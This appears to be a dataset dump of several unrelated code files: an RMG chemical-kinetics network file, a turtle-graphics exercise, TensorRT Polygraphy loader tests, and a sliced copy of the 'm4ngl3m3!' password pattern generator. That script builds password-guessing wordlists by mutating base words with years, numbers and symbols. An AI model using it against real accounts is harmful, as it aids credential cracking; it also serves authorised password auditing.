products = ['C=CC(42)', '[CH]=C=[CH](18734)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ]
Euclidian distance = 0
family: 1,4_Linear_birad_scission"""),
)
reaction(
label = 'reaction2',
reactants = ['H(8)', '[CH]C(=[CH])C(=C)C(19687)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(72.1434,'m^3/(mol*s)'), n=1.66666, Ea=(10.8177,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Cds-OneDeCs_Cds;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction3',
reactants = ['[CH](2815)', 'C#CC([CH2])C(5193)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(18.899,'m^3/(mol*s)'), n=1.76329, Ea=(16.1554,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Ct-Cs_Ct-H;YJ] for rate rule [Ct-Cs_Ct-H;CH_quartet]
Euclidian distance = 2.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction4',
reactants = ['[CH3](11)', '[CH]C(=[CH])C=C(19261)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(0.0129216,'m^3/(mol*s)'), n=2.42105, Ea=(24.5119,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Cds-OneDeH_Cds;CsJ-HHH]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction5',
reactants = ['C=CC(42)', '[CH][C]=[CH](21256)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(0.00168615,'m^3/(mol*s)'), n=2.52599, Ea=(19.6608,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Cds-CsH_Cds-HH;CJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction6',
reactants = ['[CH2][CH]C(44)', '[CH]=C=[CH](18734)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(0.523563,'m^3/(mol*s)'), n=2.10494, Ea=(22.6844,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Ct_Ct;CJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction7',
reactants = ['[CH]C([CH])=C(C)C(21272)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(4.614e+09,'s^-1'), n=1.31, Ea=(203.342,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 163 used for R2H_S;C_rad_out_OneDe/Cs;Cs_H_out_2H
Exact match found for rate rule [R2H_S;C_rad_out_OneDe/Cs;Cs_H_out_2H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 6.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction8',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C([CH2])=C([CH2])C(18079)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(13437.7,'s^-1'), n=2.58467, Ea=(192.129,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_DS;Cd_rad_out_singleH;XH_out]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction7',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C(=C)C([CH2])[CH2](17727)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(222600,'s^-1'), n=2.23, Ea=(44.3086,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4H_DSS;Cd_rad_out_singleH;Cs_H_out] for rate rule [R4H_DSS;Cd_rad_out_singleH;Cs_H_out_2H]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 6.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction10',
reactants = ['[CH3](11)', '[CH]C([CH])=C[CH2](21258)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(1.66881e+08,'m^3/(mol*s)'), n=-0.401267, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;C_methyl]
Euclidian distance = 0
family: R_Recombination
Ea raised from -6.7 to 0 kJ/mol."""),
)
reaction(
label = 'reaction11',
reactants = ['[CH2][CH]C(44)', '[CH][C]=[CH](21256)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(1.9789e+07,'m^3/(mol*s)'), n=-0.126319, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -15.6 to -15.6 kJ/mol.
Ea raised from -15.6 to 0 kJ/mol."""),
)
reaction(
label = 'reaction12',
reactants = ['H(8)', '[CH]C([CH])=C([CH2])C(19692)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(4.34078e+06,'m^3/(mol*s)'), n=0.278577, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction13',
reactants = ['H(8)', '[CH]C(=[CH])C([CH2])[CH2](19200)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(6.97354e-12,'cm^3/(molecule*s)'), n=0.6, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 18 used for C_rad/H2/Cs;H_rad
Exact match found for rate rule [C_rad/H2/Cs;H_rad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Recombination
Ea raised from -3.3 to 0 kJ/mol."""),
)
reaction(
label = 'reaction14',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C(=C)C(=C)C(18075)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(1.4874e+09,'s^-1'), n=1.045, Ea=(63.4002,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3radExo;Y_rad;XH_Rrad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction15',
reactants = ['CH2(S)(14)', '[CH]C(=[CH])C[CH2](18837)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(143764,'m^3/(mol*s)'), n=0.444, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [carbene;R_H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: 1,2_Insertion_carbene
Ea raised from -5.1 to 0 kJ/mol."""),
)
reaction(
label = 'reaction16',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C([CH])=CCC(21273)'],
transitionState = 'TS16',
kinetics = Arrhenius(A=(5.59192e+09,'s^-1'), n=1.025, Ea=(194.765,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [cCs(-HC)CJ;CsJ;CH3] for rate rule [cCs(-HC)CJ;CsJ-HH;CH3]
Euclidian distance = 1.0
family: 1,2_shiftC"""),
)
reaction(
label = 'reaction17',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C(=[CH])C[CH]C(18912)'],
transitionState = 'TS17',
kinetics = Arrhenius(A=(6.55606e+10,'s^-1'), n=0.64, Ea=(159.935,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [cCs(-HC)CJ;CsJ;C] for rate rule [cCs(-HC)CJ;CsJ-HH;C]
Euclidian distance = 1.0
family: 1,2_shiftC"""),
)
reaction(
label = 'reaction18',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C1=CCC1C(21274)'],
transitionState = 'TS18',
kinetics = Arrhenius(A=(3.24e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4;C_rad_out_2H;Ypri_rad_out] for rate rule [R4_SSD;C_rad_out_2H;CdsinglepriH_rad_out]
Euclidian distance = 2.2360679775
Multiplied by reaction path degeneracy 2.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction19',
reactants = ['CH2(T)(28)', '[CH]C([CH])=CC(21257)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS19',
kinetics = Arrhenius(A=(1.14854e+06,'m^3/(mol*s)'), n=0.575199, Ea=(34.3157,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [C_rad/H/OneDeC;Birad]
Euclidian distance = 4.0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction20',
reactants = ['H(8)', '[CH]C(=[CH])C([CH])C(21275)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS20',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction21',
reactants = ['H(8)', '[C]C(=[CH])C([CH2])C(21276)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS21',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
network(
label = '4339',
isomers = [
'[CH]C(=[CH])C([CH2])C(18883)',
],
reactants = [
('C=CC(42)', '[CH]=C=[CH](18734)'),
],
bathGas = {
'N2': 0.25,
'Ne': 0.25,
'He': 0.25,
'Ar': 0.25,
},
)
pressureDependence(
label = '4339',
Tmin = (1200,'K'),
Tmax = (1500,'K'),
Tcount = 10,
Tlist = ([1201.48,1213.22,1236.21,1269.31,1310.55,1356.92,1404.16,1447.02,1479.84,1497.7],'K'),
Pmin = (1,'atm'),
Pmax = (10,'atm'),
Pcount = 10,
Plist = ([1.02771,1.14872,1.41959,1.89986,2.67608,3.83649,5.40396,7.23219,8.93758,9.98989],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
| [
"[email protected]"
]
| |
561a473b6aa704f7d0651d89278fc1942b376384 | b3528a3795ce373e27d52362128de3cff6f9969d | /python/orbs/target/password-generator/slices1589360571.263371/success/success_39_0.py | f1896f56cc09413b60c95ec2ce3c24bce6dab1fd | []
| no_license | greenmonn/daily-coding | 43e0f3775678c7d6116df7ba5034ea18489d87c9 | ef6ecc88e6db61e18364eef3ea071c11e1385a99 | refs/heads/master | 2023-01-14T04:59:14.130309 | 2021-02-08T23:32:56 | 2021-02-08T23:32:56 | 157,735,438 | 1 | 1 | null | 2022-12-21T02:13:17 | 2018-11-15T15:47:37 | Python | UTF-8 | Python | false | false | 5,253 | py | #!/usr/bin/env python3
# m4ngl3m3! v0.1.1
# Common password pattern generator using strings list
# Follow (Medium / Twitter): @localh0t
import argparse
import sys
import os
from Mangler import ManglingParameters
from Mangler import Mangler
def build_parser():
    """Build and return the command-line argument parser.

    Returns:
        argparse.ArgumentParser: parser exposing the three positional
        arguments (mutation mode, strings file, output file) and the
        optional tuning flags consumed by ``build_mangler_with_args``.
    """
    parser = argparse.ArgumentParser(description=("Common password pattern "
                                                  "generator using strings "
                                                  "list"),
                                     formatter_class=argparse.
                                     ArgumentDefaultsHelpFormatter)
    parser.add_argument("mutation_mode",
                        metavar="MUTATION_MODE",
                        type=str,
                        help=("Mutation mode to perform: "
                              "(prefix-mode | suffix-mode | dual-mode)"),
                        choices=['prefix-mode', 'suffix-mode', 'dual-mode'])
    parser.add_argument("strings_file",
                        metavar="STRINGS_FILE",
                        type=str,
                        help="File with strings to mutate")
    parser.add_argument("output_file",
                        metavar="OUTPUT_FILE",
                        type=str,
                        help="Where to write the mutated strings")
    parser.add_argument("-fy", "--from-year",
                        metavar="FROM_YEAR",
                        type=int,
                        help="Year where our iteration starts",
                        default=2015)
    parser.add_argument("-ty", "--to-year",
                        metavar="TO_YEAR",
                        type=int,
                        help="Year where our iteration ends",
                        default=2020)
    parser.add_argument('-sy', "--short-year",
                        help=("Also add shorter year form when iterating"),
                        action='store_true',
                        default=False)
    parser.add_argument("-nf", "--numbers-file",
                        metavar="NUMBERS_FILE",
                        type=str,
                        help="Numbers prefix/suffix file",
                        default='./target/password-generator/files/numbers/numbers_set2.txt')
    parser.add_argument("-sf", "--symbols-file",
                        metavar="SYMBOLS_FILE",
                        type=str,
                        help="Symbols prefix/suffix file",
                        default='./target/password-generator/files/symbols/symbols_set2.txt')
    parser.add_argument("-cf", "--custom-file",
                        metavar="CUSTOM_FILE",
                        type=str,
                        help="Custom words/dates/initials/etc file")
    parser.add_argument('-sbs', "--symbols-before-suffix",
                        help=("Insert symbols also before years/numbers/"
                              "custom (when in suffix-mode or dual-mode)"),
                        action='store_true',
                        default=False)
    parser.add_argument('-sap', "--symbols-after-prefix",
                        help=("Insert symbols also after years/numbers/custom"
                              " (when in prefix-mode or dual-mode)"),
                        action='store_true',
                        default=False)
    # Fix: this argument previously had no `type` or `help`, making it the
    # only option that was invisible in --help output.
    parser.add_argument("-mm", "--mutation-methods",
                        metavar="MUTATION_METHODS",
                        type=str,
                        help="Comma-separated list of mutation methods to apply",
                        default='normal,'
                                'uppercase,'
                                'firstup,'
                                'replacevowels')
    return parser
def build_mangler_with_args(args):
    """Translate parsed CLI arguments into a configured :class:`Mangler`.

    Args:
        args: namespace produced by ``build_parser().parse_args()``.

    Returns:
        Mangler: instance initialised with the numbers/symbols/custom word
        lists and the year-range / mode settings from *args*.
    """
    parameters = ManglingParameters()
    # Use context managers so the file handles are closed promptly; the
    # previous version leaked an open file object per list.
    with open(args.numbers_file, 'r') as f:
        parameters.num_file = f.read().splitlines()
    with open(args.symbols_file, 'r') as f:
        parameters.sym_file = f.read().splitlines()
    if (args.custom_file):
        with open(args.custom_file, 'r') as f:
            parameters.cus_file = f.read().splitlines()
    parameters.mutation_mode = args.mutation_mode
    parameters.from_year = args.from_year
    parameters.to_year = args.to_year
    parameters.suffix_pos_swap = args.symbols_before_suffix
    # NOTE(review): args.symbols_after_prefix is parsed but never mapped onto
    # the parameters here -- confirm whether ManglingParameters exposes a
    # corresponding prefix-side flag before wiring it up.
    return Mangler(mangling_parameters=parameters)
if __name__ == "__main__":
    # Parse CLI options and build the configured mangler.
    args = build_parser().parse_args()
    mangler = build_mangler_with_args(args)
    # Dispatch table: mutation-method name -> bound mangling function.
    mangler_functions = {
        "normal": mangler.normal_mangling,
        "uppercase": mangler.uppercase_mangling,
        "firstup": mangler.firstup_mangling,
        "replacevowels": mangler.replacevowels_mangling,
    }
    # Running total of mutated strings produced across all input lines.
    written_strings = 0
    with open(args.strings_file, 'r') as f:
        for line in f:
            mangled = []
            # Apply each requested method to the (stripped) input string.
            for method in args.mutation_methods.lower().split(","):
                try:
                    (name, output) = mangler_functions[method](line.strip())
                    mangled.extend(output)
                except KeyError:
                    print("[-] The method %s is not defined !" % method)
                # NOTE(review): this print runs even after a KeyError; if the
                # very first method is unknown, `name` is unbound here and a
                # NameError would be raised -- confirm intended behaviour.
                print("[+] %s mutation method done on string: %s" %
                      (name, line.strip()))
            written_strings += len(mangled)
    # NOTE(review): args.output_file is never opened/written in this sliced
    # variant; only the count is reported (slicing instrumentation below).
    print('##v_trajectory captured: {}##'.format(written_strings))
| [
"[email protected]"
]
| |
e382659fe44a65b3a060e2c0d9cb78015fd0bea2 | 28436c3e8d5f59f9011bfac7fcdef977c345aa7b | /2021-05-15/homework1.py | 960425e000fa70c2621ff185c6e2e587beb46b6b | []
| no_license | engeeker/python-for-kid-2021 | 533d7b54ef23d99727642ba7a119e0a46577651b | 783d3582c6e9009c23213378650160f7dc937409 | refs/heads/main | 2023-08-02T15:18:17.367567 | 2021-10-01T13:15:56 | 2021-10-01T13:15:56 | 347,414,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | import turtle
import random
p = turtle.Pen()
color_list = ['red', 'yellow', 'blue', 'green']
p.speed(0)
turtle.bgcolor('black')
p.color(random.choice(color_list))
for i in range(200):
p.forward(i * 2)
p.left(91)
turtle.Screen().exitonclick() | [
"[email protected]"
]
| |
4a07ea84d52063b402726d57dbdf3727faf67046 | b09584e81194e40070d320c763856d6b0721935f | /tools/Polygraphy/tests/backend/trt/test_loader.py | 74ddfb66e8dcb83df156387239bb16de0286f81a | [
"BSD-3-Clause",
"Apache-2.0",
"ISC",
"BSD-2-Clause",
"MIT"
]
| permissive | MarkMoTrin/TensorRT | c7a46a5877b4a0687ffe2b694515e7fc923d0443 | 7f269a7e6a62f555100d9b72afb9977e702ad488 | refs/heads/main | 2023-09-05T13:08:58.048025 | 2021-10-19T08:23:08 | 2021-10-19T17:25:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,003 | py | #
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import contextlib
import sys
import pytest
import tensorrt as trt
from polygraphy import constants, mod, util
from polygraphy.backend.trt import (
Calibrator,
CreateConfig,
EngineBytesFromNetwork,
EngineFromBytes,
EngineFromNetwork,
LoadPlugins,
ModifyNetworkOutputs,
NetworkFromOnnxBytes,
Profile,
SaveEngine,
bytes_from_engine,
engine_from_network,
modify_network_outputs,
network_from_onnx_bytes,
network_from_onnx_path,
onnx_like_from_network,
)
from polygraphy.comparator import DataLoader
from tests.helper import get_file_size, is_file_non_empty
from tests.models.meta import ONNX_MODELS
##
## Fixtures
##
@pytest.fixture(scope="session")
def identity_engine():
    """Session-scoped TRT engine built from the 'identity' ONNX model."""
    network_loader = NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader)
    engine_loader = EngineFromNetwork(network_loader, CreateConfig())
    # Yield inside the context manager so the engine is freed at teardown.
    with engine_loader() as engine:
        yield engine
@pytest.fixture(scope="session")
def identity_builder_network():
    """Yield (builder, network) parsed from the 'identity' ONNX model."""
    builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["identity"].loader)
    # The parser is kept alive via the with-block but not yielded.
    with builder, network, parser:
        yield builder, network
@pytest.fixture(scope="session")
def identity_network():
builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["identity"].loader)
with builder, network, parser:
yield builder, network, parser
@pytest.fixture(scope="session")
def identity_identity_network():
builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["identity_identity"].loader)
with builder, network, parser:
yield builder, network, parser
@pytest.fixture(scope="session")
def reshape_network():
builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["reshape"].loader)
with builder, network, parser:
yield builder, network, parser
@pytest.fixture(scope="session")
def modifiable_network():
# Must return a loader since the network will be modified each time it's loaded.
return NetworkFromOnnxBytes(ONNX_MODELS["identity_identity"].loader)
@pytest.fixture(scope="session")
def modifiable_reshape_network():
# Must return a loader since the network will be modified each time it's loaded.
return NetworkFromOnnxBytes(ONNX_MODELS["reshape"].loader)
##
## Tests
##
class TestLoadPlugins(object):
def test_can_load_libnvinfer_plugins(self):
def get_plugin_names():
return [pc.name for pc in trt.get_plugin_registry().plugin_creator_list]
loader = LoadPlugins(
plugins=["nvinfer_plugin.dll" if sys.platform.startswith("win") else "libnvinfer_plugin.so"]
)
loader()
assert get_plugin_names()
class TestSerializedEngineLoader(object):
def test_serialized_engine_loader_from_lambda(self, identity_engine):
with util.NamedTemporaryFile() as outpath:
with open(outpath.name, "wb") as f, identity_engine.serialize() as buffer:
f.write(buffer)
loader = EngineFromBytes(lambda: open(outpath.name, "rb").read())
with loader() as engine:
assert isinstance(engine, trt.ICudaEngine)
def test_serialized_engine_loader_from_buffer(self, identity_engine):
with identity_engine.serialize() as buffer:
loader = EngineFromBytes(buffer)
with loader() as engine:
assert isinstance(engine, trt.ICudaEngine)
class TestOnnxNetworkLoader(object):
def test_loader(self):
builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["identity"].loader)
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert not network.has_explicit_precision
def test_loader_explicit_precision(self):
builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["identity"].loader, explicit_precision=True)
with builder, network, parser:
assert not network.has_implicit_batch_dimension
if mod.version(trt.__version__) < mod.version("8.0"):
assert network.has_explicit_precision
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("7.1.0.0"), reason="API was added in TRT 7.1")
class TestNetworkFromOnnxPath(object):
def test_loader(self):
builder, network, parser = network_from_onnx_path(ONNX_MODELS["identity"].path)
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert not network.has_explicit_precision
def test_loader_explicit_precision(self):
builder, network, parser = network_from_onnx_path(ONNX_MODELS["identity"].path, explicit_precision=True)
with builder, network, parser:
assert not network.has_implicit_batch_dimension
if mod.version(trt.__version__) < mod.version("8.0"):
assert network.has_explicit_precision
class TestModifyNetwork(object):
def test_mark_layerwise(self, modifiable_network):
load_network = ModifyNetworkOutputs(modifiable_network, outputs=constants.MARK_ALL)
builder, network, parser = load_network()
with builder, network, parser:
for layer in network:
for index in range(layer.num_outputs):
assert layer.get_output(index).is_network_output
def test_mark_custom_outputs(self, modifiable_network):
builder, network, parser = modify_network_outputs(modifiable_network, outputs=["identity_out_0"])
with builder, network, parser:
assert network.num_outputs == 1
assert network.get_output(0).name == "identity_out_0"
def test_exclude_outputs_with_mark_layerwise(self, modifiable_network):
builder, network, parser = modify_network_outputs(
modifiable_network, outputs=constants.MARK_ALL, exclude_outputs=["identity_out_2"]
)
with builder, network, parser:
assert network.num_outputs == 1
assert network.get_output(0).name == "identity_out_0"
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("7.0"), reason="Unsupported for TRT 6")
def test_mark_shape_outputs(self, modifiable_reshape_network):
builder, network, parser = modify_network_outputs(
modifiable_reshape_network, outputs=["output", "reduce_prod_out_gs_2"]
)
with builder, network, parser:
assert network.num_outputs == 2
assert network.get_output(0).name == "reduce_prod_out_gs_2"
assert network.get_output(0).is_shape_tensor
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("7.0"), reason="Unsupported for TRT 6")
def test_unmark_shape_outputs(self, modifiable_reshape_network):
builder, network, parser = modify_network_outputs(
modifiable_reshape_network, outputs=constants.MARK_ALL, exclude_outputs=["reduce_prod_out_gs_2"]
)
with builder, network, parser:
assert network.num_outputs == 1
class TestConfigLoader(object):
def test_defaults(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig()
assert loader.timing_cache_path is None
with loader(builder, network) as config:
assert config.max_workspace_size == 1 << 24
with contextlib.suppress(AttributeError):
assert not config.get_flag(trt.BuilderFlag.TF32)
with contextlib.suppress(AttributeError):
assert not config.get_flag(trt.BuilderFlag.SPARSE_WEIGHTS)
assert not config.get_flag(trt.BuilderFlag.FP16)
assert not config.get_flag(trt.BuilderFlag.INT8)
assert config.num_optimization_profiles == 1
assert config.int8_calibrator is None
with contextlib.suppress(AttributeError):
if mod.version(trt.__version__) < mod.version("8.0"):
assert config.get_tactic_sources() == 3
else:
assert config.get_tactic_sources() == 7
def test_workspace_size(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig(max_workspace_size=0)
with loader(builder, network) as config:
assert config.max_workspace_size == 0
@pytest.mark.parametrize("flag", [True, False])
def test_strict_types(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(strict_types=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.STRICT_TYPES) == flag
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("8.0.0.0"), reason="API was added in TRT 8.0")
@pytest.mark.parametrize("flag", [True, False])
def test_restricted(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(restricted=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.SAFETY_SCOPE) == flag
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("7.1.0.0"), reason="API was added in TRT 7.1")
@pytest.mark.parametrize("flag", [True, False])
def test_tf32(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(tf32=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.TF32) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_fp16(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(fp16=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.FP16) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_int8(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(int8=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.INT8) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_allow_gpu_fallback(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(allow_gpu_fallback=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.GPU_FALLBACK) == flag
@pytest.mark.skipif(
mod.version(trt.__version__) < mod.version("8.0"), reason="API was not available in 7.2 and older"
)
@pytest.mark.parametrize("flag", [True, False])
def test_sparse_weights(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(sparse_weights=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.SPARSE_WEIGHTS) == flag
def test_use_dla(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig(use_dla=True)
with loader(builder, network) as config:
assert config.default_device_type == trt.DeviceType.DLA
assert config.DLA_core == 0
with contextlib.suppress(AttributeError):
if mod.version(trt.__version__) < mod.version("8.0"):
TACTIC_SOURCES_CASES = [
(None, 3), # By default, all sources are enabled.
([], 0),
([trt.TacticSource.CUBLAS], 1),
([trt.TacticSource.CUBLAS_LT], 2),
([trt.TacticSource.CUBLAS, trt.TacticSource.CUBLAS_LT], 3),
]
else:
TACTIC_SOURCES_CASES = [
(None, 7), # By default, all sources are enabled.
([], 0),
([trt.TacticSource.CUBLAS], 1),
([trt.TacticSource.CUBLAS_LT], 2),
([trt.TacticSource.CUDNN], 4),
([trt.TacticSource.CUBLAS, trt.TacticSource.CUBLAS_LT], 3),
([trt.TacticSource.CUBLAS, trt.TacticSource.CUDNN], 5),
([trt.TacticSource.CUBLAS_LT, trt.TacticSource.CUDNN], 6),
([trt.TacticSource.CUDNN, trt.TacticSource.CUBLAS, trt.TacticSource.CUBLAS_LT], 7),
]
@pytest.mark.parametrize("sources, expected", TACTIC_SOURCES_CASES)
def test_tactic_sources(self, identity_builder_network, sources, expected):
builder, network = identity_builder_network
loader = CreateConfig(tactic_sources=sources)
with loader(builder, network) as config:
assert config.get_tactic_sources() == expected
def test_calibrator_metadata_set(self, identity_builder_network):
builder, network = identity_builder_network
calibrator = Calibrator(DataLoader())
loader = CreateConfig(int8=True, calibrator=calibrator)
with loader(builder, network) as config:
assert config.int8_calibrator
assert "x" in calibrator.data_loader.input_metadata
def test_multiple_profiles(self, identity_builder_network):
builder, network = identity_builder_network
profiles = [
Profile().add("x", (1, 2, 1, 1), (1, 2, 2, 2), (1, 2, 4, 4)),
Profile().add("x", (1, 2, 4, 4), (1, 2, 8, 8), (1, 2, 16, 16)),
]
loader = CreateConfig(profiles=profiles)
with loader(builder, network) as config:
assert config.num_optimization_profiles == 2
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("8.0"), reason="Unsupported for TRT 7.2 and older")
@pytest.mark.parametrize("path_mode", [True, False], ids=["path", "file-like"])
def test_timing_cache(self, identity_builder_network, path_mode):
builder, network = identity_builder_network
with util.NamedTemporaryFile() as cache:
loader = CreateConfig(load_timing_cache=cache.name if path_mode else cache)
with loader(builder, network) as config:
assert config.get_timing_cache()
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("8.0"), reason="Unsupported for TRT 7.2 and older")
def test_empty_timing_cache_when_default(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig()
with loader(builder, network) as config:
cache = config.get_timing_cache()
with cache.serialize() as buffer:
cache_size = len(bytes(buffer))
cache.reset()
with cache.serialize() as buffer:
new_cache_size = len(bytes(buffer))
assert cache_size == new_cache_size
class TestEngineBytesFromNetwork(object):
def test_can_build(self, identity_network):
loader = EngineBytesFromNetwork(identity_network)
with loader() as serialized_engine:
assert isinstance(serialized_engine, trt.IHostMemory)
class TestEngineFromNetwork(object):
def test_defaults(self, identity_network):
loader = EngineFromNetwork(identity_network)
assert loader.timing_cache_path is None
def test_can_build_with_parser_owning(self, identity_network):
loader = EngineFromNetwork(identity_network)
with loader():
pass
def test_can_build_without_parser_non_owning(self, identity_builder_network):
